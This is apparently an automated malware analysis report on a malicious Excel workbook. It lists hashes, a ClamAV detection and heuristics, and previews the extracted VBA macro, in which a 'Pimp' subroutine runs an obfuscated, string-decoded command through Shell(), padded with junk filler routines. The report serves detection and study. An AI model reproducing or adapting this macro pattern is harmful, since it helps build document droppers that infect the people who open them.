Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c3164407257b993d…

MALICIOUS

Office (OOXML)

58.7 KB Created: 2006-09-16 00:00:00 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-09-07
MD5: c62d0af3bcf7063f59465671c686aa8c SHA-1: 3fd5698db16d0aa72162b915c2c6cca146fb4e5b SHA-256: c3164407257b993dc3eb339805822f2c597e3985b3ae8bf8f08d44e3aa00fea3
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macro. The macro's 'Pimp' subroutine attempts to construct and execute a command using obfuscated string concatenation. This behavior is characteristic of malware that downloads and executes additional payloads, as suggested by the ClamAV detection name 'Xls.Malware.Stratos-7506050-0'.

Heuristics 3

  • ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 28690 bytes
SHA-256: 876de2fadf2904072d32dc58492b3aba65c238af6edcacedea4f566e5cb71f77
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Public Sub Pimp()

Y6 = YoTpIoY3l("  ?  M  < ", "imWrrmwfH")

Shell (Y6 + YoTpIoY3l("W=8Rv&9;;   Y }", "mad8XKIgZ"))

End Sub
Private Sub kIBxIaoKxHfaDElFKS()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"

End Sub
Private Function MpuHEnAaaBJQySVnNoztLuQALRNZq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop

End Function
Public Function SwbZGvPFwKUDDq()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:

End Function
Public Sub cieqGHdfoLsVmSZsApU()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM

End Sub
Private Sub GtUrDRzQCGhURLebyTs()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End

End Sub
Public Sub SQxQicusOkI()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
   DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop

End Sub
Private Function GLjqxbonDHKBbqjSA()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
   DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End

End Function
Public Function NeEETJMEdGljQFaQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   DoEvents
Next FyFkKwMPSKjMrbQLgQM
If "YtvEOJnCUpICsYhhg" = "VOVANMdgjbzOracwZerBQkYJlHGiP" Then End
Dim zUIRpkNPwQVe As Integer
zUIRpkNPwQVe = 7
Do While zUIRpkNPwQVe < 20
   DoEvents: zUIRpkNPwQVe = zUIRpkNPwQVe + 1
Loop
If "SOxLllLUhJdIgyYy" = "DVEcLVcYkAPQZiFAeMSmukPKKJOz" Then End
GoTo NBBdlxatZwObOMGZVs
NBBdlxatZwObOMGZVs:

End Function
Public Sub nsoARSopyQ()
Dim wBZfmQedtwzrQfY As Long
wBZfmQedtwzrQfY = "6084"
Dim vqTVCIckZEAAyDpvCTut As Integer
vqTVCIckZEAAyDpvCTut = 7
Do While vqTVCIckZEAAyDpvCTut < 34
   DoEvents: vqTVCIckZEAAyDpvCTut = vqTVCIckZEAAyDpvCTut + 1
Loop
GoTo OjNmEPEBvNKi
OjNmEPEBvNKi:
Dim FyFkKwMPSKjMrbQLgQM As Integer
For FyFkKwMPSKjMrbQLgQM = 1 To 6
   
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 107008 bytes
SHA-256: 9f1e3794c339f2e9a0715f581ea2926bf7b8f6ffd89d96a82a57082e5ab592b7
Detection
ClamAV: Xls.Malware.Stratos-7506050-0
Obfuscation or payload: unlikely